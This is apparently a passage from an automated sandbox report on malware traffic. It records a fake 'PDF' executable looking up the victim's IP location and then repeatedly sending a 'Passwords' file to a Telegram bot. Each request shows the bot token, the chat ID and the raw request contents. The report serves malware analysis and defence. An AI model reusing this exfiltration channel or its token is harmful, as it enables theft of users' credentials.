                                                                                                                                2024-12-16 07:44:39 UTC1390INData Raw: ec 19 9c 89 cb 2d c0 96 38 36 5b 6a 74 17 67 95 f1 9f 81 47 65 d6 19 04 95 2a c6 f5 5e 8e b7 67 c0 44 59 fc 6d 14 4a aa e7 0c 1b 38 6f 12 c6 1d c6 cc 14 d9 6a b6 fe 69 54 a4 ff a9 ca b0 0b 55 38 f6 a4 5d a6 66 8b b2 1b 3f 60 b0 17 ae d4 fd d1 7b 19 65 71 22 14 40 c8 59 91 a1 a9 55 7d d7 5d ac 30 ad 9a d5 74 e8 3a 39 e5 a3 ca 7e 5c c2 f6 65 da 72 be 2f 39 1d 79 74 30 19 a4 d3 37 47 ab c8 c7 dd e6 52 51 53 d7 bc aa 81 08 c7 d1 4c ae 12 29 2c 61 ad 97 bd e4 76 9a ee 61 bb 08 28 fb ef ee 9e e1 92 5b 5b c8 a3 1b 68 2e 0b b5 46 3f 8a 0c 1b c4 60 21 95 6d 7b 27 99 29 76 c6 fc 92 b1 f7 84 a1 f1 86 c7 ef 41 c3 79 a9 00 40 6b 48 b4 9f 8a 86 24 61 0b 70 b3 06 0b b4 7d ff 32 79 39 9c 05 03 cd a2 81 9d ec 34 77 4e 43 79 a3 98 0e 1f 30 96 b1 c3 18 3b db f4 02 5e 7d 68
                                                                                                                                Data Ascii: -86[jtgGe*^gDYmJ8ojiTU8]f?`{eq"@YU}]0t:9~\er/9yt07GRQSL),ava([[h.F?`!m{')vAy@kH$ap}2y94wNCy0;^}h
                                                                                                                                2024-12-16 07:44:39 UTC1390INData Raw: a1 1b af 24 a3 c7 bf 57 11 a5 d1 b9 29 6e 16 e9 a9 cf bc dc bd 3a 54 c8 d4 d0 b3 b3 51 50 b0 5c ab 29 3e 2c a1 9c 6b 50 4e aa 6c 7e e6 b8 56 7e 1d 6a 0d c0 a3 5d 5f 1d 3a ff 2d b7 db d6 03 de 29 81 da 95 70 a0 2b d8 7e b5 86 8f f9 b9 76 29 b4 0b cf 6c 59 99 53 d0 14 15 af c2 cf 77 e0 b5 41 52 c4 2f 96 b2 d4 62 4f be d7 57 41 d2 ef c0 1e cb ab 27 6a d7 7a 6e fe 4d 2b d7 29 b2 72 c6 f8 3f 08 d5 d1 53 b0 6c 78 97 d4 54 77 d5 e1 4d 04 70 86 42 d2 c7 17 26 3f ec b8 64 3d 9a 6d be cd a4 63 e1 66 3f 62 59 2a 00 03 59 d1 af e0 5a 30 77 70 8c c9 41 75 5b 9c 65 a2 2f 91 c2 ca f4 0a b9 33 3e e1 50 43 03 cc d9 a2 e4 29 17 d9 3d 40 ad 96 4a e0 56 4e d9 c7 bc 73 93 fa 8a 22 e4 11 c0 bf c3 bc 40 42 d8 7e 74 f0 4f 42 50 55 09 f8 a4 4f 8b cd aa 3a 27 25 2a 17 8e ca 21 c0
                                                                                                                                Data Ascii: $W)n:TQP\)>,kPNl~V~j]_:-)p+~v)lYSwAR/bOWA'jznM+)r?SlxTwMpB&?d=mcf?bY*YZ0wpAu[e/3>PC)=@JVNs"@B~tOBPUO:'%*!
                                                                                                                                2024-12-16 07:44:39 UTC1390INData Raw: 57 89 fd 24 66 b7 33 28 55 90 f7 a5 43 e2 4a 7f 65 f6 72 58 e1 d1 76 05 e3 c5 97 12 bf 91 11 18 53 78 75 4b c0 85 22 0b 1d df f8 83 19 fc b9 4d 59 d0 c6 40 e2 b8 7f 2a d2 f0 ba fc ea af e6 7e 8c 5a 10 12 0f bd 62 8a 76 5f 02 2a 15 21 d6 00 c2 88 4c bd ae 19 1c 12 e1 48 e8 62 f1 54 95 2f 34 0a 9c 5b 5d 3a 54 bf 7f 2a 8d 22 ce 2a 54 f6 05 2a 85 f9 4b 05 c5 29 69 97 6d 07 30 77 80 a0 92 84 a2 cc fe b4 00 50 5c 4d 3a 88 9d 44 be f5 75 36 3d 40 f9 fb 4e f5 63 bc ea 36 7a 53 ae 11 12 2f 69 8e c8 b9 2d fc 87 f2 4a 1d 54 37 a6 8f b4 62 ec 64 39 0c 53 45 5c 78 eb fa 56 a3 8e 57 12 45 b7 68 c5 35 63 67 02 85 31 eb de 4d d3 2f 8c 64 c7 5b 07 7f fb 13 c2 f1 9e 9e 47 36 31 c7 c0 04 f6 ea 7d 1e 41 b9 60 50 ae 50 80 b5 99 b3 8b 2e 26 32 f5 c4 8b 6c 12 96 9c 64 33 48 cc
                                                                                                                                Data Ascii: W$f3(UCJerXvSxuK"MY@*~Zbv_*!LHbT/4[]:T*"*T*K)im0wP\M:Du6=@Nc6zS/i-JT7bd9SE\xVWEh5cg1M/d[G61}A`PP.&2ld3H


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                2192.168.2.549817104.21.67.152443616C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-16 07:44:43 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                Host: reallyfreegeoip.org
                                                                                                                                Connection: Keep-Alive
                                                                                                                                2024-12-16 07:44:44 UTC878INHTTP/1.1 200 OK
                                                                                                                                Date: Mon, 16 Dec 2024 07:44:43 GMT
                                                                                                                                Content-Type: text/xml
                                                                                                                                Content-Length: 362
                                                                                                                                Connection: close
                                                                                                                                Cache-Control: max-age=31536000
                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                Age: 323852
                                                                                                                                Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                                Accept-Ranges: bytes
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JGuAZBiTgYYJ%2BcuVp1qtnbdPeTDApZinkL4MyIoUkcXd4Ui8zIIUeqctEE3EneMGSerNh7zEcfDt41yN2%2Baf5PLOI9JnPYE%2BM3SeNfVs9bI1zq3r2NRbYpfz4rg2H5A2F77%2Bnpf1"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f2d0cc27ef11a3c-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1783&min_rtt=1777&rtt_var=680&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1594756&cwnd=229&unsent_bytes=0&cid=52bde3f29f2c3e7f&ts=454&x=0"
                                                                                                                                2024-12-16 07:44:44 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                3192.168.2.549837149.154.167.220443616C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-16 07:44:52 UTC296OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                                Content-Type: multipart/form-data; boundary================8dd1d7b9c0b8eeb
                                                                                                                                Host: api.telegram.org
                                                                                                                                Content-Length: 1090
                                                                                                                                Connection: Keep-Alive
                                                                                                                                2024-12-16 07:44:52 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 64 37 62 39 63 30 62 38 65 65 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                Data Ascii: --===============8dd1d7b9c0b8eebContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                                2024-12-16 07:44:52 UTC388INHTTP/1.1 200 OK
                                                                                                                                Server: nginx/1.18.0
                                                                                                                                Date: Mon, 16 Dec 2024 07:44:52 GMT
                                                                                                                                Content-Type: application/json
                                                                                                                                Content-Length: 543
                                                                                                                                Connection: close
                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                2024-12-16 07:44:52 UTC543INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 32 35 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 33 33 35 30 39 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":12250,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734335092,"document":{"file_n


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                4192.168.2.549846149.154.167.220443616C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-16 07:44:55 UTC296OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                                Content-Type: multipart/form-data; boundary================8dd1dadbdd2d442
                                                                                                                                Host: api.telegram.org
                                                                                                                                Content-Length: 1090
                                                                                                                                Connection: Keep-Alive
                                                                                                                                2024-12-16 07:44:55 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 64 61 64 62 64 64 32 64 34 34 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                Data Ascii: --===============8dd1dadbdd2d442Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                                2024-12-16 07:44:56 UTC388INHTTP/1.1 200 OK
                                                                                                                                Server: nginx/1.18.0
                                                                                                                                Date: Mon, 16 Dec 2024 07:44:55 GMT
                                                                                                                                Content-Type: application/json
                                                                                                                                Content-Length: 543
                                                                                                                                Connection: close
                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                2024-12-16 07:44:56 UTC543INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 32 35 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 33 33 35 30 39 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":12251,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734335095,"document":{"file_n


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                5192.168.2.549857149.154.167.220443616C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-16 07:44:58 UTC272OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                                Content-Type: multipart/form-data; boundary================8dd1dd8a5601335
                                                                                                                                Host: api.telegram.org
                                                                                                                                Content-Length: 1090
                                                                                                                                2024-12-16 07:44:58 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 64 64 38 61 35 36 30 31 33 33 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                Data Ascii: --===============8dd1dd8a5601335Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                                2024-12-16 07:44:59 UTC388INHTTP/1.1 200 OK
                                                                                                                                Server: nginx/1.18.0
                                                                                                                                Date: Mon, 16 Dec 2024 07:44:59 GMT
                                                                                                                                Content-Type: application/json
                                                                                                                                Content-Length: 543
                                                                                                                                Connection: close
                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                2024-12-16 07:44:59 UTC543INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 32 35 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 33 33 35 30 39 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":12252,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734335099,"document":{"file_n


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                6192.168.2.549869149.154.167.220443616C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-16 07:45:03 UTC296OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                                Content-Type: multipart/form-data; boundary================8dd1e17dc155d45
                                                                                                                                Host: api.telegram.org
                                                                                                                                Content-Length: 1090
                                                                                                                                Connection: Keep-Alive
                                                                                                                                2024-12-16 07:45:03 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 65 31 37 64 63 31 35 35 64 34 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                Data Ascii: --===============8dd1e17dc155d45Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                                2024-12-16 07:45:04 UTC388INHTTP/1.1 200 OK
                                                                                                                                Server: nginx/1.18.0
                                                                                                                                Date: Mon, 16 Dec 2024 07:45:04 GMT
                                                                                                                                Content-Type: application/json
                                                                                                                                Content-Length: 543
                                                                                                                                Connection: close
                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                2024-12-16 07:45:04 UTC543INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 32 35 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 33 33 35 31 30 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":12253,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734335104,"document":{"file_n


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                7192.168.2.549904149.154.167.220443616C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-16 07:45:17 UTC272OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                                Content-Type: multipart/form-data; boundary================8dd1ebb7bf07885
                                                                                                                                Host: api.telegram.org
                                                                                                                                Content-Length: 1090
                                                                                                                                2024-12-16 07:45:17 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 65 62 62 37 62 66 30 37 38 38 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                Data Ascii: --===============8dd1ebb7bf07885Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                                2024-12-16 07:45:18 UTC388INHTTP/1.1 200 OK
                                                                                                                                Server: nginx/1.18.0
                                                                                                                                Date: Mon, 16 Dec 2024 07:45:18 GMT
                                                                                                                                Content-Type: application/json
                                                                                                                                Content-Length: 542
                                                                                                                                Connection: close
                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                2024-12-16 07:45:18 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 32 35 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 33 33 35 31 31 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":12254,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734335118,"document":{"file_n


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                8192.168.2.549913149.154.167.220443616C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-16 07:45:21 UTC272OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
